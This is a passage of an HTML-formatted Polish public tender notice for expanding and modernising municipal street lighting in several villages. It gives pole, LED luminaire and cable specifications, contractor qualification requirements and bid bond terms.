bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanych latarń wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetleniowego słup nr 105. Droga gminna dz. nr 209/13: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o punkt świetlny na słupie wykonanym z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanym na prefabrykowanym fundamencie betonowym. Na słupie należy zbudować oprawę ledową LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupie oświetleniowym od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Projektowaną latarnię wstawić w przelot linii kablowej pomiędzy latarniami Nr 98 i 99. Słup należy tak wstawiać, by można było po odkopaniu kabla na długości 3m i przecięciu kabla wprowadzić go do projektowanej latarni, a drugi koniec przeciętego kabla po zmufowaniu go z 5 metrowym odcinkiem kabla YAKXS 4 x 25 mm2 podłączyć również w projektowanej latarni. Połączenia kabli wykonać mufą kablową termokurczliwą przelotową 0,6/1 kVo izolacji polimerowej.6. KRUSZYN dz. nr 956, 621, 622 i 318Opracowanie obejmuje wykonanie rozbudowy i modernizacji oświetlenia dróg gminnych w miejscowości Kruszyn. Droga gminna dz. nr 956: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o cztery punkty świetlne na słupach wykonanych z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanych na prefabrykowanych fundamentach betonowych. Na słupach należy zbudować oprawy ledowe LED ED 6850 lm/740 O2 – 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupach oświetleniowych od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanych latarń wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetleniowego słup nr 17.Droga gminna dz. nr 621: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o dwa punkty świetlne na słupach wykonanych z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanych na prefabrykowanych fundamentach betonowych. Na słupach należy zbudować oprawy ledowe LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupach oświetleniowych od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanych latarń wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetleniowego słup nr 4. Droga gminna dz. nr 622: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o siedem punktów świetlnych na słupach wykonanych z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanych na prefabrykowanych fundamentach betonowych, oraz wymianie na trzech słupach wysięgników na dwuramienne 1200. Na słupach należy zbudować oprawy ledowe LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupach oświetleniowych od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanych latarń wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetleniowego słup nr 2. Droga gminna dz. nr 318: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o punkt świetlny na słupie wykonanym z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5 m mocowanym na prefabrykowanym fundamencie betonowym. Na słupie należy zbudować oprawę ledową LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupie oświetleniowym od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanej latarni nr 78/1 wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetleniowego słup nr 6.	7. NOWA dz. nr 89Rozbudowę oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o dwa punkty świetlne na słupach wykonanych z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanych na prefabrykowanych fundamentach betonowych. Na słupach należy zbudować oprawy ledowe LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupach oświetleniowych od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanych latarń wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetleniowego słup nr 33.8. NOWA WIEŚ dz. nr 446/2 i 429Opracowanie obejmuje wykonanie rozbudowy i modernizacji oświetlenia dróg gminnych w miejscowości Nowa Wieś. Droga gminna dz. nr 446/2: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o punkt świetlny na słupie wykonanym z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanym na prefabrykowanym fundamencie betonowym. Na słupie należy zbudować oprawę ledową LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupie oświetleniowym od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanej latarni nr 28/1 wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetleniowego słup nr 28. Projektowany kabel należy wciągnąć w istniejącą rurę ochroną 50. Latarnie należy uziemić łącząc płaskownikiem cynk. Fe/Zn 20 x 3 mm układanym na dnie rowu kablowego. Rezystancja uziomu nie powinna przekroczyć 30  .Droga gminna dz. nr 429: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o punkt świetlny na słupie wykonanym z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanym na prefabrykowanym fundamencie betonowym. Na słupie należy zbudować oprawę ledową LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupie oświetleniowym od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanej latarni nr 24/4 wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetleniowego słup nr 24/1.	9. TRZEBIEŃ dz. nr 512/216Rozbudowę oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o punkt świetlny na słupie wykonanym z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanych na prefabrykowanym fundamencie betonowym. Na słupie należy zbudować oprawę ledową LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupie oświetleniowym od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanej latarni wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetleniowego słup nr 11.10. MIERZWIN dz. nr 51Demontaż istniejącego oświetlenia wykonanego linią napowietrzną ASXSn na słupach ŻN z oprawami sodowymi.Budowę dwóch obwodów kablowych oświetlenia będących przedłużeniem istniejących obwodów oświetlenia drogowego stanowiących rozbudowę oświetlenia polegającej na uzupełnieniu o punkty świetlne na słupach wykonanych z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanych na prefabrykowanych fundamentach betonowych. Na słupach należy zbudować oprawy ledowe LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupach oświetleniowych od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V.11. TRZEBIEŃ MAŁY dz. nr 286, 234, 235 i 267Demontaż istniejącego oświetlenia wykonanego linią napowietrzną ASXSn na słupach ŻN i drewnianych z oprawami sodowymi. Wymianę opraw na istniejących słupach stalowych na oprawy ledowe. Budowę dwóch obwodów kablowych oświetlenia zasilanych z istniejącej szafki oświetleniowej stanowiących rozbudowę oświetlenia polegającej na uzupełnieniu o punkty świetlne na słupach wykonanych z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanych na prefabrykowanych fundamentach betonowych. Na słupach należy zbudować oprawy ledowe LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500.W słupach oświetleniowych od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V.12. ŻELISZÓW dz. nr 146/3, 491/14 i 220Opracowanie obejmuje wykonanie rozbudowy i modernizacji oświetlenia dróg gminnych w miejscowości Żeliszów. Droga gminna dz. nr: 146/3: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o dziesięć punktów świetlnych na słupach wykonanych z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanych na prefabrykowanych fundamentach betonowych. Projektowany obwód oświetleniowy zasilany będzie z istniejącej szafki oświetleniowej SO zabudowanej przy stacji transformatorowej przy drodze dz. nr 136 kablem YAKXS 4 x 16 mm2. Do projektowanego obwodu należy wpiąć istniejący obwód oświetlenia drogi dz. nr 155 łącząc go z latarnią nr 73/2 i rozłączając w latarni nr 68 na drodze dz. nr 155. Na słupach należy zbudować oprawy ledowe LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupach oświetleniowych od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Istniejące oświetlenie wykonane linią napowietrzną należy zdemontować.Droga gminna dz. nr 491/14: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o punkt świetlny na słupie wykonanym z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanym na prefabrykowanym fundamencie betonowym. Na słupie należy zbudować oprawę ledową LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupie oświetleniowym od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Projektowaną latarnię wstawić w przelot linii kablowej pomiędzy latarniami nr 14 i 15 na drodze dz. nr 491/14. Słup należy tak wstawiać, by można było po odkopaniu kabla na długości 3m i przecięciu kabla wprowadzić go do projektowanej latarni, a drugi koniec przeciętego kabla po zmufowaniu go z 5 metrowym odcinkiem kabla YAKXS 4 x 25 mm2 podłączyć również w projektowanej latarni. Połączenia kabli wykonać mufą kablową termokurczliwą przelotową 0,6/1 kV o izolacji polimerowej.Droga gminna dz. nr 220: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o punkt świetlny na słupie wykonanym z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanym na prefabrykowanym fundamencie betonowym. Na słupie należy zbudować oprawę ledową LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupie oświetleniowym od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanej latarni nr 118/1 wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetleniowego słup nr 118.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45316110-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-08-31</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2020-08-31</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1. Wykonawca musi wykazać, że dysponuje osobą z uprawnieniami upoważniającymi do wykonywania samodzielnej funkcji kierownika budowy w specjalności instalacyjno - inżynieryjnej w zakresie instalacji elektrycznych minimum do 1kV. Osoba wskazana jako ta, która będzie pełnić funkcję kierownika budowy musi należeć do właściwej izby samorządu zawodowego.Przez uprawnienia należy rozumieć: uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994r. Prawo budowlane (Dz.U. z 2018 poz. 1202, t. j. ze zm.) oraz w Rozporządzeniu Ministra Infrastruktury i Rozwoju w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r. poz. 1278) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwy organ, zgodnie z ustawą z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tj. Dz.U. z 2018r. poz. 2272) do pełnienia samodzielnej funkcji w budownictwie.2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają wiedzę i doświadczenie poprzez wykazanie należytego wykonania, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonych robót budowlanych (w okresie ostatnich pięciu lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), polegających na realizacji co najmniej jednego zadania związanego z budową oświetlenia drogowego obejmującego niemniej niż 80 punktów oświetlenia drogowego (w ramach jednej umowy na realizację robót budowlanych). </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5-u lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane - wg wzoru Zał. nr 4 „Doświadczenie Zawodowe”Wykaz dotyczy zamówień podobnych do przedmiotu zamówienia (patrz Rozdział V pkt 2 ppkt 2.3. SIWZ) tj. polegające na realizacji co najmniej jednego zadania związanego z budową oświetlenia drogowego obejmującego niemniej niż 80 punktów oświetlenia drogowego (w ramach jednej umowy na realizację robót budowlanych).Wykonawca dołączy dowody określające czy roboty budowlane zamieszczone w Zał. nr 4 „Doświadczenie Zawodowe” zostały wykonane należycie, w szczególności informacja o tym czy roboty zostały wykonane zgodnie z przepisami Prawa budowlanego i prawidłowo ukończone. Dowodami są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane. Jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów załączy inne dokumenty poświadczające spełnienie warunku.2. Informację o osobie, która będzie pełnić funkcję kierownika budowy – w specjalności instalacyjno-inżynieryjnej w zakresie instalacji elektrycznych minimum do 1 kV (samodzielna funkcja techniczna w budownictwie, musi należeć do właściwej izby samorządu budowlanego) wg wzoru Zał. nr 5 „Potencjał Kadrowy”.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Oferta powinna zawierać wszystkie wymagane dokumenty, oświadczenia, informacje i załączniki w kolejności jak niżej:1. Wypełniony, (zawierający imię i nazwisko, nazwę firmy i dokładny adres Wykonawcy, NIP,nr tel., e-meil), oznaczony datą, sporządzony wg wzoru „Formularz Oferty” – Zał. nr 1 - i właściwie podpisany określający i zawierający m.in.: 1) Cenę ryczałtową brutto dla zamówienia za wykonanie pełnego zakresu zamówienia 2) Ceny brutto za poszczególne zadania (SIWZ Rozdział III pkt. 1.4. ppkt od 1.4.1. do 1.4.12)3) Termin wykonania (nie później niż 31.08.2020r.)4) Okres gwarancji jakości (min. 60 miesięcy).5) Informacje o wadium i nr konta, na który należy je zwrócić.2. Oświadczenia wymagane postanowieniami rozdziału VI pkt. 1 SIWZ jako Zał. nr 2 i 3 oraz w terminie 3-ch dni od dnia zamieszczenia na stronie internetowej Zamawiającego informacji z otwarcia ofert Zał. nr 7.3. W przypadku gdy Wykonawcę reprezentuje pełnomocnik, do oferty musi być załączone pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy (w przypadku dla oferty wspólnej – pełnomocnictwo dla lidera).</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. Wykonawca zobowiązany jest wnieść wadium w wysokości 8.000,00 zł (słownie: osiem tysięcy zł 00/100) na okres związania ofertą.2. Wadium może być wniesione w jednej lub kilku następujących formach:- pieniądzu,- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo – kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,- gwarancjach bankowych,- gwarancjach ubezpieczeniowych,- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2018 r. poz. 110, 650, 1000 i 1669).3. Wadium wniesione w formie pieniężnej należy wpłacić na rachunek Zamawiającego Łużycki Bank Spółdzielczy w Lubaniu Oddział w Bolesławcu 92 8392 0004 2600 2017 2000 0040UWAGA !!! Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej"></span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span 